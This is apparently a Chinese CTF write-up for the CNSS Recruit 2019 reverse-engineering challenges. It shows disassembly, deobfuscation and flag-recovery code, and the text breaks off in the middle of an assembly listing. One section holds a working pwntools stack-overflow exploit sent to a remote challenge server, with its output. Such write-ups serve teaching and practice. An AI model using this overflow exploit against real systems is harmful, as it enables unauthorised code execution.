• CNSS Recruit 2019 Reverse Writeup


    搭建虚拟机

    按照题目要求,安装VM,下载Ubuntu64镜像,在虚拟机里直接执行文件即可得到Flag

    byaidu@ubuntu:~/ws$ ./movgcc
    cnss{H31l0,1inUx!!}

     

    Baby_string

    Flag在原程序中以明文存储,用IDA加载并按Shift+F12查看字符串即可找到

    .data:00403004 00000019 C cnss{7h1s_iS_wh4t_R3_1s}

     

    Baby_encode

    F5查看伪代码

    scanf("%s", input);
    for ( i = 0; i < strlen(flag); ++i )
      flag[i] ^= 7u;
    if ( !strcmp(flag, input) )
      puts("Oh you got the flag!");

     注意flag处存储着一段数据

    .data:00403004 ; char flag[]
    .data:00403004 _flag           db 'ditt|7oXj~X`77777777C&z',0

     发现将密文的每一位都异或上7就能得到Flag

    #include <cstdio>
    #include <cstring>
    char flag[]="ditt|7oXj~X`77777777C&z";
    int main()
    {
      for (int i=0;i<strlen(flag);i++) flag[i]^=7u;
      printf("%s",flag);
    }
    //cnss{0h_my_g00000000D!}

     

    snake

    F5查看伪代码

    v4 = dword_40EDC0 ^ 0xE9;
    if ( v4 > 265 )
    {
      v5 = dword_40EDC0 ^ 0xE9;
      sub_4032B3(v5);
    }

    由伪代码可知,当蛇的长度大于265时,游戏就能通关

    考虑在关键命令Patch想办法把v4v5的值改成266即可伪装成通关的状态

    Tab查看汇编代码

    .text:00402E87 loc_402E87:                             ; CODE XREF: sub_4027D6+6AB↑j
    .text:00402E87                 mov     eax, ds:dword_40EDC0
    .text:00402E8C                 xor     al, 0E9h
    .text:00402E8E                 cmp     eax, 109h
    .text:00402E93                 jle     short loc_402EA4
    .text:00402E95                 mov     eax, ds:dword_40EDC0
    .text:00402E9A                 xor     al, 0E9h
    .text:00402E9C                 mov     [esp], eax
    .text:00402E9F                 call    sub_4032B3

    查看上下文可知dword_40EDC0中存储着蛇的长度异或上0x0E9的结果,又因为266=0x10A=0x1E3^0x0E9,所以把两处mov eax, ds:dword_40EDC0都替换成mov eax, 1E3h,修改完成后记得Apply 

    这时再运行程序即可直接得到Flag

    //cnss{CE_caN_ju5T_Act_w1lfulLy!!}

     

    Baby_Assembly_Code

    此题主要考察Linux64传参顺序

    extern printf
     
    SECTION .data
        name:         db 'mrh929', 0
        HelloCnss:    db 'hello,cnss!', 10, 9 , "---%s", 10,0
        str1:         db "Let's start reading the assembly code!",10,0
     
        enc:          db 0,0,0,7,6,83,83,0,19,11,84,79,7,17,65,5,73,29,14,77,4,4,0,0,2,18,31,6,24,14,13,13,73,12,1,69,68,0,0,0
        str2:         db "Come on!",10,0
        exp1:         db "%s%s",0
     
        str3:         db "input your answer:",10,0
        exp2:         db "(%d + %d + %d + %d * %d - (%d >> 1)) ^ %d = ?", 10, "%s"0
     
    SECTION .text
    global main
     
    alter_str: //字符串编码,将edi指向的字符串中的每个值都异或上esi指向的字符串中的对应值,遇到0为止
        push    rbp //保存堆栈
        mov     rbp, rsp
        xor     ecx, ecx //清空ecx
     
        label:
        mov     al, [edi+ecx] //edi+ecx地址中的值存到al寄存器
        test    al, al //判断al是否为零
        je      quit //zf=1即al为零跳到quit
        mov     bl, [esi+ecx] //esi+ecx地址中的值存到al寄存器
        xor     al, bl //用bl异或al
        mov     [edi+ecx], al //al中的值存到edi+ecx地址中
        add     ecx, 1 //ecx++指向下一位
        jmp     label //跳到label
     
        quit:
        leave //还原堆栈
        ret //返回原函数
     
    main:  ;主函数从这里开始
        push    rbp //保存堆栈
        mov     rbp, rsp
     
        mov     rdi, HelloCnss //HelloCnss的地址存到rdi寄存器中
        mov     rsi, name //name的地址存到rsi寄存器中
        call    printf //输出HelloCnss和name
     
        mov     rdi, str1 //str的地址存到rdi寄存器中
        mov     rsi, enc //enc的地址存到rsi寄存器中
        call    alter_str //调用alter_str,用enc编码str1
     
        mov     rdi, exp1 //同理
        mov     rsi, str1
        mov     rdx, str2
        call    printf //调用printf函数,用exp1格式化输出str1和str2
     
        mov     rdi, exp2
        mov     rsi, 1
        mov     rdx, 2
        mov     rcx, 3
        mov     r8, 4
        mov     r9, 5
        push    str3
        push    7
        push    6
     
        mov     rax, 0
        call    printf //用exp2格式化输出其它参数,输出(1 + 2 + 3 + 4 * 5 - (6 >> 1)) ^ 7 = ? <换行> str3
    //_fastcall尽可能用mov寄存器传参,_stdcall和_cdecl用push堆栈传参,顺序从右到左(至少C++里是这个顺序)
    //64位linux下前6个参数用寄存器传入,后面的所有参数压栈传入
    //32位linux下所有函数都用压栈传入
     
        sub     rsp, 10 //栈顶-10,提供大小为10的空间
        mov     rax, 0 //rax=0
        mov     rdi, 2 //rdi=2
        mov     rsi, rsp //rsi=栈顶,告诉函数栈空间位置
        mov     rdx, 10 //rdx=10即告诉函数栈空间大小为10
        syscall //syscall是linux中间层,类似于int中断,这里通过syscall来调用sys_read读取用户输入
     
        ; prepare for fixing input
        lea     rcx, [rsi] //rcx=rsi
        add     rcx, rax //rcx指向字符串末尾
     
        push 0x000a  //压栈10
        mov     rdx, 0x2174686769722074
        push rdx
        mov     rdx, 0x6f6e207369207325
    push rdx
        mov rax, rsp //压栈字符串”%s is not right!”,rax指向字符串
     
        mov     rdx, 0x000a21746867
        push rdx
        mov     rdx, 0x6972207369207325
    push rdx
    mov rbx, rsp //压栈字符串”%s is right!”,rbx指向字符串
     
        mov     dl, [rsi]
        cmp     dl, 0x31
        jne     end
        mov     dl, [rsi+1]
        cmp     dl, 0x36
        jne     end
        mov     dl, [rsi+2]
        cmp     dl, 0xa
        jne     end //判断输入为16 <换行>,如果不是则跳到end
     
        mov     rdi, rbx //rdi指向字符串”%s is right!”
        jmp     stop  //跳到stop
     
        end:
        mov     rdi, rax //rdi指向字符串”%s is not right!”
     
        stop:
        ; Fix the output
        sub     rcx, 1 //rcx-=1
        mov     byte [rcx], 0 //字符串末尾添0
        ; Show the result
        xor     rax, rax //rax=0
        call    printf //输出结果is (not) right!
     
        mov     rax, 0 //rax=0
        leave //还原堆栈
        ret  //返回原函数
    View Code

     

    <--指针-->

    此题主要考察有符号无符号类型转换

    *(unsigned long long*)(a.var1) = 0x01020304aabbccdd
    声明a.var1指向八个字节大小的空间,并在其中存储了八个字节的内容,在内存中的顺序是由低到高
     
    a.var1[i]以unsigned char的形式一次从中取出一个字节并输出,%X接受四个字节,因为是无符号数,前三个字节全部补0即可
    结果为
    0xDD,0xCC,0xBB,0xAA,0x4,0x3,0x2,0x1,
     
    a.var2[i]以char的形式一次从中取出一个字节,但%X接受四个字节,所以需要类型转换,又因为char是有符号数,所以需要判断符号位
    处理01,0203,04时候因为二进制最高位为0,要保证表示的数字不变,前面全部补0即可,没有影响
    处理aa,bb,cc,dd时候因为二进制最高位为1,计算机中负数用补码表示,要保证表示的数字不变,前面全部补1,换成16进制即为F
    结果为
    0xFFFFFFDD,0xFFFFFFCC,0xFFFFFFBB,0xFFFFFFAA,0x4,0x3,0x2,0x1,
     
    a.var1 + 8 + i
    地址越位,指向存储在a.var1之后的a.var2,并将其指向的内容改写为0到7,而对a.var1的内容没有影响
    结果为
    0xDD,0xCC,0xBB,0xAA,0x4,0x3,0x2,0x1,
    0x0,0x1,0x2,0x3,0x4,0x5,0x6,0x7,
    View Code

     

    Easy_Flat

    F5查看伪代码

      __isoc99_scanf("%s", s);
      v12 = strlen(s);
      v8 = 2094104837;
      while ( 1 )
      {
        while ( 1 )
        {
          while ( 1 )
          {
            while ( 1 )
            {
              while ( 1 )
              {
                while ( 1 )
                {
                  while ( 1 )
                  {
                    while ( v8 == -1910856655 )
                    {
                      v4 = -1741896534;
                      if ( v9 <= 25 )
                        v4 = 437352961;
                      v8 = v4;
                    }
                    if ( v8 != -1741896534 )
                      break;
                    v5 = strcmp(s, (const char *)(unsigned int)s2) == 0;
                    v6 = 1105054524;
                    if ( v5 )
                      v6 = 304955634;
                    v8 = v6;
                  }
                  if ( v8 != -1214177781 )
                    break;
                  sub_400610(s);
                  v11 = 0;
                  v8 = 658032998;
                }
                if ( v8 != -1113027527 )
                  break;
                v9 = 0;
                v8 = -1910856655;
              }
              if ( v8 != -170736245 )
                break;
              ++v9;
              v8 = -1910856655;
            }
            if ( v8 != 304955634 )
              break;
            sub_400640(s);
            v8 = 658032998;
          }
          if ( v8 != 437352961 )
            break;
          s[v9] += v9;
          v8 = -170736245;
        }
        if ( v8 == 658032998 )
          break;
        if ( v8 == 1105054524 )
        {
          sub_400610(s);
          v8 = 658032998;
        }
        else if ( v8 == 2094104837 )
        {
          v3 = -1113027527;
          if ( v12 != 26 )
            v3 = -1214177781;
          v8 = v3;
        }
      }

    注意到s2处存储着一段数据

    .data:0000000000601050 ; char s2[4]
    .data:0000000000601050 s2              db 63h, 6Fh, 75h, 76h, 7Fh, 35h, 68h, 6Dh, 7Dh, 3Eh, 6Dh, 6Ch, 60h, 3Eh, 3Eh, 7Dh, 6Fh, 42h, 65h, 72h, 7Bh, 67h, 49h, 78h, 6Ch, 96h

    虽然代码经过混淆,但是很容易就能看出加密算法

    通过如下三个关键语句,可以猜出程序的逻辑是把用户输入的Flag的每一位的ASCII都加上这一位的序数,再和程序中存储的密文进行比较

    v9 = 0;
    ++v9;
    s[v9] += v9;

    所以只要把密文的每一位都减去这一位的序数就可以得到Flag

    #include <cstdio>
    #include <cstring>
    char flag[]={0x63,0x6F,0x75,0x76,0x7F,0x35,0x68,0x6D,0x7D,0x3E,0x6D,0x6C,0x60,0x3E,0x3E,0x7D,0x6F,0x42,0x65,0x72,0x7B,0x67,0x49,0x78,0x6C,0x96};
    int main()
    {
      for (int i=0;i<sizeof(flag);i++) flag[i]-=i;
      printf("%s",flag);
    }
    //cnss{0bfu5caT10n_1S_gR3aT}

     

    Mips架构逆向

    直接用IDA插件一把梭,或者照着Mips指令集硬翻就可以了

    //cnss{71me_t0_le4rn_Mips}

     

    辉夜大小姐想要玩游戏

    F5查看伪代码

    __isoc99_scanf("%s", s);
      v4 = s;
      if ( strlen(s) == v3 )
      {
        v7 = 0;
        v8 = 0;
        while ( v7 <= 80 )
        {
          if ( !dword_203020[v7] )
          {
            v6 = v8++;
            dword_203020[v7] = s[v6] - 48;
          }
          ++v7;
        }
        v9 = 1;
        for ( i = 0; i <= 8; ++i )
        {
          v4 = (char *)&dword_203020[9 * i];
          v9 &= sub_F3B(v4);
        }
        for ( j = 0; j <= 8; ++j )
        {
          v4 = (char *)&dword_203020[j];
          v9 &= sub_FFA(v4);
        }
        for ( k = 0; k <= 2; ++k )
        {
          for ( l = 0; l <= 2; ++l )
          {
            v4 = (char *)&dword_203020[27 * k + 3 * l];
            v9 &= sub_10C3(v4);
          }
        }
        if ( v9 )
        {
          puts("don-dayo!");
          sub_11A1(s);
          puts(byte_2032C0);
        }
      }

    sub_F3B检测每行是否有重复数字

    sub_FFA检测每行是否有重复数字

    sub_10C3检测每个3x3区域是否有重复数字

    容易联想到题目是在要求我们填入数独的答案

    将dword_203020处的数据以每行9列的格式显示,可以印证上边的猜测

    .data:0000000000203020 ; _DWORD dword_203020[104]
    .data:0000000000203020 dword_203020    dd 0, 0, 7, 0, 0, 0, 4, 0, 0
    .data:0000000000203020                                         ; DATA XREF: sub_127B+21↑o
    .data:0000000000203020                                         ; main+F2↑o ...
    .data:0000000000203020                 dd 6, 0, 0, 3, 0, 0, 0, 0, 8
    .data:0000000000203020                 dd 0, 0, 0, 0, 0, 1, 0, 0, 0
    .data:0000000000203020                 dd 3, 0, 0, 9, 0, 0, 0, 0, 1
    .data:0000000000203020                 dd 0, 0, 0, 0, 4, 0, 2, 0, 0
    .data:0000000000203020                 dd 8, 0, 0, 0, 0, 0, 0, 0, 0
    .data:0000000000203020                 dd 0, 0, 2, 0, 0, 0, 0, 9, 0
    .data:0000000000203020                 dd 0, 0, 0, 6, 0, 0, 0, 0, 3
    .data:0000000000203020                 dd 0, 0, 4, 0, 0, 0, 0, 0, 0
    .data:0000000000203020                 dd 0, 0, 0, 0, 0, 0, 0, 0, 0
    .data:0000000000203020                 dd 0, 0, 0, 0, 0, 0, 0, 0, 0

     接下来只需要把数据填到在线解数独网站上求解再将结果输入到程序中即可得到Flag

    //cnss{faN7ast1c_5ud0ku_R3verse!!}

     

    Junk Code

    开局F5,结果IDA代码分析失败,不能生成伪代码

    Space查看汇编代码,发现存在大量垃圾代码导致IDA不能正常分析代码

    分析如下的垃圾代码

    .text:00411AC2                 call    $+5
    .text:00411AC7                 add     dword ptr [esp], 5
    .text:00411ACB                 retn

    首先执行call $+5使得ret=00411AC7

    再执行add dword ptr [esp], 5使得ret+=5,这时ret=00411ACC

    最后执行retn,使得程序跳转到ret指向的位置,即00411ACC

    考虑把call $+5替换成jmp $+10,或者把上述三条语句都nop掉,这样IDA就能正常分析代码了,这里用的是第一种方法

    我们可以先把call $+5替换成jmp 00411ACCh,发现对应的字节从E8 00 00 00 00变为EB 08 00 00 00

    同理我们可以利用C32asm把所有的E8 00 00 00 00都用EB 08 00 00 00来替换,这样就实现了所有call $+5到jmp $+10的转化

    这时我们再F5就可以正常生成伪代码了

    v26 = (int *)(unsigned __int8)*(&Str + i);
    v33 = sub_41133E(v26);
    v29 = dword_41D000[v32];
    v32++;
    if ( v33 != v29 ) {
    return sub_41123A(v12, v11); }

     注意到dword_41D000处存储着一段数据

    .data:0041D000 ; int dword_41D000[35]
    .data:0041D000 dword_41D000    dd 0ED02Eh, 14519Fh, 173801h, 173801h, 1C683Ch, 2AEBEh
    .data:0041D000                                         ; DATA XREF: sub_411780+1639↑r
    .data:0041D000                 dd 169D98h, 1872B0h, 17D3CDh, 0FB9DCh, 0D16FAh, 53D52h
    .data:0041D000                 dd 1B055h, 169D98h, 0ED02Eh, 0FB9DCh, 0D16FAh, 28AD0h
    .data:0041D000                 dd 14E08Ch, 0D16FAh, 53D52h, 400E9h, 0ED02Eh, 12B367h
    .data:0041D000                 dd 0D16FAh, 63088h, 1872B0h, 14519Fh, 2064Fh, 0D16FAh
    .data:0041D000                 dd 49854h, 14E08Ch, 4CCEFh, 0FB9DCh, 1DCFEBh

    程序将用户输入内容的每一位都用sub_41133E加密再和程序中的密文比较,所以我们只需要建立一个反向映射即可解密密文,从而得到Flag

    这里可以偷个懒,介绍一种从外部调用exe中函数的方法,众所周知exedll都是PE文件,所以可以把exe当成dll来用,需要使用CFF Explorer修改PE属性为DLL,网上有很多关于修改方法的文章,具体细节在此不再阐述

    加载exe后把0~127作为参数依次调用sub_41133E可以很方便地得到映射关系,从而建立反向映射解密密文。

    #include <stdio.h>
    #include <windows.h>
    #include <map>
    using namespace std;
    typedef int (*func1)(int);
    map<int,int> keymap;
    int code[]={0x0ED02E,0x14519F,0x173801,0x173801,0x1C683C,0x2AEBE,0x169D98,0x1872B0,0x17D3CD,0x0FB9DC,0x0D16FA,0x53D52,0x1B055,0x169D98,0x0ED02E,0x0FB9DC,0x0D16FA,0x28AD0,0x14E08C,0x0D16FA,0x53D52,0x400E9,0x0ED02E,0x12B367,0x0D16FA,0x63088,0x1872B0,0x14519F,0x2064F,0x0D16FA,0x49854,0x14E08C,0x4CCEF,0x0FB9DC,0x1DCFEB};
    int main(){
        HMODULE hdll = NULL;
        hdll = LoadLibrary("JunkCode.exe");
        if(hdll != NULL){
            printf("YES\n");
            func1 myfunc = ((func1)((PBYTE)hdll+0x1133E));
            for (int i=0;i<128;i++)
        {
          int ret=myfunc(i);
          keymap[ret]=i;
          printf("%d->%d\n",i,ret);
        }
        for (int i=0;i<sizeof(code);i++)
        {
          char ch=(char)keymap[code[i]];
          printf("%c",ch);
        }
        }else{
            printf("NO\n");
        }
        FreeLibrary(hdll);
        return 0;
    }
    //cnss{8rute_F0rce_7o_F@ck_Jun3_CoDe}

     

    砰的前奏

    F5查看伪代码

    ssize_t key()
    {
      char buf; // [rsp+0h] [rbp-20h]
      puts("Send me a string.");
      return read(0, &buf, 0x100uLL);
    }
    int ans() { return system("cat ./flag"); }

    查看栈帧

    -0000000000000020 buf             db 32 dup(?)
    +0000000000000000  s              db 8 dup(?)
    +0000000000000008  r              db 8 dup(?)

    key函数存在缓冲区漏洞,利用栈溢出替换掉ret地址,使程序跳转到ans函数打印Flag

    注意到ret前有buf+s=40字节的空间需要填充,所以构造payload = "A"*40 + p64(callsystem)

    #!python
    #!/usr/bin/env python
    from pwn import *
    p = remote("139.9.5.20",60609)
    callsystem = 0x40070A
    payload = "A"*40 + p64(callsystem)
    p.send(payload)
    p.interactive()

    Pwn,得到Flag

    byaidu@ubuntu:~$ python ./test.py
    [+] Opening connection to 139.9.5.20 on port 60609: Done
    [*] Switching to interactive mode
    Send me a string.
    cnss{W31c0me_t0_pwn1ng_w0r1d}
    [*] Got EOF while reading in interactive

     

    Confusion

    F5查看伪代码

      sub_426980("%s", &unk_4992A0);
      sub_4026A4();
      sub_4026CE();
      sub_40280B();
      sub_40275E();
      sub_402B39();
      if ( (unsigned __int8)sub_402B82(&unk_499322, &unk_499312) )
      {
        sub_402630();
      }

    sub_4026A4和sub_4026CE检测输入的格式

    sub_40280B解密程序中存储的Flag密文

    sub_40275E和sub_402B39分别用同一套算法来加密用户输入的Flag和刚才解密得到的Flag

    对于前面的格式检测,填入cnss{00000000000000000000000000}即可绕过

    发现程序会在运行时还原出明文Flag,所以只要在sub_40280B后下断点就可以从内存中找到Flag

    .bss:004992E0 ; char aCnssUH4ve5ett1[50]
    .bss:004992E0 aCnssUH4ve5ett1 db 'cnss{U_h4ve_5ett1ed_A_haRd_Gam3}',0

     

    Surprise

    F5查看伪代码,发现有Upx壳的相关信息,于是先脱Upx壳

    upx surprise -d

    再F5查看伪代码

    第一层的密码位数很短,可以不用逆向出逻辑,直接就能暴力跑出来

    接下来会有一个假跳转

    需要查看汇编代码找到真正的跳转地址

    真正的函数里会用Switch混淆过的代码来解密Flag,看下存在xor指令可以猜出来是这里用的是异或加密,但是具体的顺序看不出来

    .text:00000000004017CD loc_4017CD:                             ; CODE XREF: .text:0000000000401A63↓j
    .text:00000000004017CD                 mov     eax, [rbp-0FCCh]
    .text:00000000004017D3                 cdqe
    .text:00000000004017D5                 mov     eax, dword_6030E0[rax*4]
    .text:00000000004017DC                 cmp     eax, 1Fh        ; switch 32 cases
    .text:00000000004017DF                 ja      loc_401A5B      ; jumptable 00000000004017EF default case
    .text:00000000004017E5                 mov     eax, eax
    .text:00000000004017E7                 mov     rax, ds:off_4021D8[rax*8]
    .text:00000000004017EF                 jmp     rax             ; switch jump
    .text:00000000004017F1 ; ---------------------------------------------------------------------------
    .text:00000000004017F1
    .text:00000000004017F1 loc_4017F1:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:00000000004017F1                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:00000000004017F1                 mov     eax, [rbp-0FCCh] ; jumptable 00000000004017EF case 1
    .text:00000000004017F7                 add     eax, 1
    .text:00000000004017FA                 cdqe
    .text:00000000004017FC                 mov     eax, dword_6030E0[rax*4]
    .text:0000000000401803                 add     [rbp-0FC8h], eax
    .text:0000000000401809                 add     dword ptr [rbp-0FCCh], 2
    .text:0000000000401810                 jmp     loc_401A5C
    .text:0000000000401815 ; ---------------------------------------------------------------------------
    .text:0000000000401815
    .text:0000000000401815 loc_401815:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:0000000000401815                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:0000000000401815                 mov     eax, [rbp-0FCCh] ; jumptable 00000000004017EF case 2
    .text:000000000040181B                 add     eax, 1
    .text:000000000040181E                 cdqe
    .text:0000000000401820                 mov     ecx, dword_6030E0[rax*4]
    .text:0000000000401827                 mov     eax, [rbp-0FC8h]
    .text:000000000040182D                 cdq
    .text:000000000040182E                 idiv    ecx
    .text:0000000000401830                 mov     [rbp-0FC8h], edx
    .text:0000000000401836                 add     dword ptr [rbp-0FCCh], 2
    .text:000000000040183D                 jmp     loc_401A5C
    .text:0000000000401842 ; ---------------------------------------------------------------------------
    .text:0000000000401842
    .text:0000000000401842 loc_401842:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:0000000000401842                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:0000000000401842                 mov     eax, [rbp-0FC0h] ; jumptable 00000000004017EF case 3
    .text:0000000000401848                 xor     [rbp-0FC4h], eax
    .text:000000000040184E                 add     dword ptr [rbp-0FCCh], 1
    .text:0000000000401855                 jmp     loc_401A5C
    .text:000000000040185A ; ---------------------------------------------------------------------------
    .text:000000000040185A
    .text:000000000040185A loc_40185A:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:000000000040185A                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:000000000040185A                 mov     eax, [rbp-0FC8h] ; jumptable 00000000004017EF case 4
    .text:0000000000401860                 cdqe
    .text:0000000000401862                 movzx   eax, ds:byte_6031C0[rax]
    .text:0000000000401869                 movzx   eax, al
    .text:000000000040186C                 mov     [rbp-0FC4h], eax
    .text:0000000000401872                 add     dword ptr [rbp-0FCCh], 1
    .text:0000000000401879                 jmp     loc_401A5C
    .text:000000000040187E ; ---------------------------------------------------------------------------
    .text:000000000040187E
    .text:000000000040187E loc_40187E:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:000000000040187E                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:000000000040187E                 mov     eax, [rbp-0FC8h] ; jumptable 00000000004017EF case 5
    .text:0000000000401884                 cdqe
    .text:0000000000401886                 movzx   eax, byte ptr ds:qword_6031A0[rax]
    .text:000000000040188D                 movzx   eax, al
    .text:0000000000401890                 mov     [rbp-0FC0h], eax
    .text:0000000000401896                 add     dword ptr [rbp-0FCCh], 1
    .text:000000000040189D                 jmp     loc_401A5C
    .text:00000000004018A2 ; ---------------------------------------------------------------------------
    .text:00000000004018A2
    .text:00000000004018A2 loc_4018A2:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:00000000004018A2                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:00000000004018A2                 mov     eax, [rbp-0FC8h] ; jumptable 00000000004017EF case 6
    .text:00000000004018A8                 cdqe
    .text:00000000004018AA                 movzx   eax, byte_6030A0[rax]
    .text:00000000004018B1                 movzx   eax, al
    .text:00000000004018B4                 mov     [rbp-0FC0h], eax
    .text:00000000004018BA                 add     dword ptr [rbp-0FCCh], 1
    .text:00000000004018C1                 jmp     loc_401A5C
    .text:00000000004018C6 ; ---------------------------------------------------------------------------
    .text:00000000004018C6
    .text:00000000004018C6 loc_4018C6:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:00000000004018C6                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:00000000004018C6                 mov     eax, [rbp-0FCCh] ; jumptable 00000000004017EF case 7
    .text:00000000004018CC                 add     eax, 1
    .text:00000000004018CF                 cdqe
    .text:00000000004018D1                 mov     eax, dword_6030E0[rax*4]
    .text:00000000004018D8                 mov     [rbp-0FC8h], eax
    .text:00000000004018DE                 add     dword ptr [rbp-0FCCh], 2
    .text:00000000004018E5                 jmp     loc_401A5C
    .text:00000000004018EA ; ---------------------------------------------------------------------------
    .text:00000000004018EA
    .text:00000000004018EA loc_4018EA:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:00000000004018EA                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:00000000004018EA                 mov     eax, [rbp-0FCCh] ; jumptable 00000000004017EF case 8
    .text:00000000004018F0                 add     eax, 1
    .text:00000000004018F3                 cdqe
    .text:00000000004018F5                 mov     eax, dword_6030E0[rax*4]
    .text:00000000004018FC                 sub     [rbp-0FC8h], eax
    .text:0000000000401902                 add     dword ptr [rbp-0FCCh], 2
    .text:0000000000401909                 jmp     loc_401A5C
    .text:000000000040190E ; ---------------------------------------------------------------------------
    .text:000000000040190E
    .text:000000000040190E loc_40190E:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:000000000040190E                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:000000000040190E                 mov     eax, [rbp-0FBCh] ; jumptable 00000000004017EF case 11
    .text:0000000000401914                 lea     edx, [rax+1]
    .text:0000000000401917                 mov     [rbp-0FBCh], edx
    .text:000000000040191D                 cdqe
    .text:000000000040191F                 mov     edx, [rbp-0FC0h]
    .text:0000000000401925                 mov     [rbp+rax*4-0FB0h], edx
    .text:000000000040192C                 add     dword ptr [rbp-0FCCh], 1
    .text:0000000000401933                 jmp     loc_401A5C
    .text:0000000000401938 ; ---------------------------------------------------------------------------
    .text:0000000000401938
    .text:0000000000401938 loc_401938:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:0000000000401938                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:0000000000401938                 cmp     dword ptr [rbp-0FBCh], 0 ; jumptable 00000000004017EF case 10
    .text:000000000040193F                 jle     short loc_40195D
    .text:0000000000401941                 sub     dword ptr [rbp-0FBCh], 1
    .text:0000000000401948                 mov     eax, [rbp-0FBCh]
    .text:000000000040194E                 cdqe
    .text:0000000000401950                 mov     eax, [rbp+rax*4-0FB0h]
    .text:0000000000401957                 mov     [rbp-0FC0h], eax
    .text:000000000040195D
    .text:000000000040195D loc_40195D:                             ; CODE XREF: .text:000000000040193F↑j
    .text:000000000040195D                 add     dword ptr [rbp-0FCCh], 1
    .text:0000000000401964                 jmp     loc_401A5C
    .text:0000000000401969 ; ---------------------------------------------------------------------------
    .text:0000000000401969
    .text:0000000000401969 loc_401969:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:0000000000401969                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:0000000000401969                 sub     dword ptr [rbp-0FC8h], 1 ; jumptable 00000000004017EF case 12
    .text:0000000000401970                 add     dword ptr [rbp-0FCCh], 1
    .text:0000000000401977                 jmp     loc_401A5C
    .text:000000000040197C ; ---------------------------------------------------------------------------
    .text:000000000040197C
    .text:000000000040197C loc_40197C:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:000000000040197C                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:000000000040197C                 mov     eax, [rbp-0FB8h] ; jumptable 00000000004017EF case 13
    .text:0000000000401982                 mov     [rbp-0FC8h], eax
    .text:0000000000401988                 add     dword ptr [rbp-0FCCh], 1
    .text:000000000040198F                 jmp     loc_401A5C
    .text:0000000000401994 ; ---------------------------------------------------------------------------
    .text:0000000000401994
    .text:0000000000401994 loc_401994:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:0000000000401994                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:0000000000401994                 mov     eax, [rbp-0FC8h] ; jumptable 00000000004017EF case 14
    .text:000000000040199A                 mov     [rbp-0FB8h], eax
    .text:00000000004019A0                 add     dword ptr [rbp-0FCCh], 1
    .text:00000000004019A7                 jmp     loc_401A5C
    .text:00000000004019AC ; ---------------------------------------------------------------------------
    .text:00000000004019AC
    .text:00000000004019AC loc_4019AC:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:00000000004019AC                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:00000000004019AC                 mov     eax, [rbp-0FCCh] ; jumptable 00000000004017EF case 20
    .text:00000000004019B2                 add     eax, 1
    .text:00000000004019B5                 cdqe
    .text:00000000004019B7                 mov     eax, dword_6030E0[rax*4]
    .text:00000000004019BE                 cmp     eax, [rbp-0FC8h]
    .text:00000000004019C4                 jl      short loc_4019E0
    .text:00000000004019C6                 mov     eax, [rbp-0FCCh]
    .text:00000000004019CC                 add     eax, 2
    .text:00000000004019CF                 cdqe
    .text:00000000004019D1                 mov     eax, dword_6030E0[rax*4]
    .text:00000000004019D8                 mov     [rbp-0FCCh], eax
    .text:00000000004019DE                 jmp     short loc_401A5C
    .text:00000000004019E0 ; ---------------------------------------------------------------------------
    .text:00000000004019E0
    .text:00000000004019E0 loc_4019E0:                             ; CODE XREF: .text:00000000004019C4↑j
    .text:00000000004019E0                 mov     eax, [rbp-0FCCh]
    .text:00000000004019E6                 add     eax, 3
    .text:00000000004019E9                 cdqe
    .text:00000000004019EB                 mov     eax, dword_6030E0[rax*4]
    .text:00000000004019F2                 mov     [rbp-0FCCh], eax
    .text:00000000004019F8                 jmp     short loc_401A5C
    .text:00000000004019FA ; ---------------------------------------------------------------------------
    .text:00000000004019FA
    .text:00000000004019FA loc_4019FA:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:00000000004019FA                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:00000000004019FA                 mov     eax, [rbp-0FC4h] ; jumptable 00000000004017EF case 21
    .text:0000000000401A00                 cmp     eax, [rbp-0FC0h]
    .text:0000000000401A06                 jnz     short loc_401A22
    .text:0000000000401A08                 mov     eax, [rbp-0FCCh]
    .text:0000000000401A0E                 add     eax, 2
    .text:0000000000401A11                 cdqe
    .text:0000000000401A13                 mov     eax, dword_6030E0[rax*4]
    .text:0000000000401A1A                 mov     [rbp-0FCCh], eax
    .text:0000000000401A20                 jmp     short loc_401A5C
    .text:0000000000401A22 ; ---------------------------------------------------------------------------
    .text:0000000000401A22
    .text:0000000000401A22 loc_401A22:                             ; CODE XREF: .text:0000000000401A06↑j
    .text:0000000000401A22                 mov     eax, [rbp-0FCCh]
    .text:0000000000401A28                 add     eax, 1
    .text:0000000000401A2B                 cdqe
    .text:0000000000401A2D                 mov     eax, dword_6030E0[rax*4]
    .text:0000000000401A34                 mov     [rbp-0FCCh], eax
    .text:0000000000401A3A                 jmp     short loc_401A5C
    .text:0000000000401A3C ; ---------------------------------------------------------------------------
    .text:0000000000401A3C
    .text:0000000000401A3C loc_401A3C:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:0000000000401A3C                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:0000000000401A3C                 mov     dword ptr [rbp-0FB4h], 1 ; jumptable 00000000004017EF case 30
    .text:0000000000401A46                 jmp     short loc_401A5C
    .text:0000000000401A48 ; ---------------------------------------------------------------------------
    .text:0000000000401A48
